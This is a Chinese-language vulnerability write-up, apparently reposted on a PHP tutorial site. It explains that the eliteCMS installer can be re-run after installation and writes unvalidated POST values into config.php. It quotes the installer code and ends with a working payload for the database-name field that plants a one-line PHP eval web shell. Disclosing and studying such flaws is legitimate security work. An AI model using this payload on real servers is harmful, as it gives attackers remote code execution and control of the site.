来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php我们来看代码:...elseif ($_...
|
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码:
...
elseif ($_GET['step'] == "4") {
$file = "../admin/includes/config.php";
$write = "<?php\n";
$write .= "/**\n";
$write .= "*\n";
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
$write .= "*\n";
$write .= "*/\n";
$write .= "\n";
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
$write .= "if (!\$connection) {\n";
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$write .= " \n";
$write .= "} \n";
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
$write .= "if (!\$db_select) {\n";
$write .= " die(\"Database select failed\" .mysql_error());\n";
$write .= " \n";
$write .= "} \n";
$write .= "?>\n";
$writer = fopen($file, 'w');
...
再看代码: www.2cto.com
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
取值未作任何验证
如果将数据库名POST数据:
"?><?php eval($_POST[c]);?><?php
将导致一句话后门写入/admin/includes/config.php
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
